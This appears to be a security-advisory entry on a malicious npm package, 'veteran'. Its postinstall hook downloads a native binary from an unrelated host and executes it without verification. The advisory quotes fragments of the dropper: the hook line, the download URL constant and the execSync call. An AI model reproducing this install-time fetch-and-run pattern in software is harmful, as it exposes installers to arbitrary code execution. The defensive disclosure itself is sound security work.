Vulnerability
Malicious code in veteran (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (70a20dd9f8d6a9df01d766c25693711d90e4303e3c68fa371f0b842f83c485b4) On `npm install`, the package's postinstall hook (`install.js`, registered via `package.json` line 10 `"postinstall": "node install.js"`) downloads a platform-specific executable from `https://laogou.us/download/veteran/v1.0.0/veteran_1.0.0_<platform>_<arch>.{tar.gz,zip}` (install.js:13 `const DOWNLOAD_BASE_URL = 'https://laogou.us/download/veteran'`), extracts it via shell `tar`/`unzip`, `chmod 0o755`s it (install.js:165), and immediately executes it (install.js:170 `execSync("${BIN_PATH}" version",...)`). The download host `laogou.us` does not match the package's declared publisher/homepage (`github.com/yongjie0203/veteran`); the URL is not version-pinned to a hash or signature; no checksum or signature verification is performed on the fetched bytes; and source comments suggest the URL is meant to be swapped by future maintainers. The operator of `laogou.us` can therefore serve arbitrary native code to every installer, with the bytes executed under the installer's user on `npm install`. This matches the publisher-mismatched, unverified, mutable-host dropper pattern.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence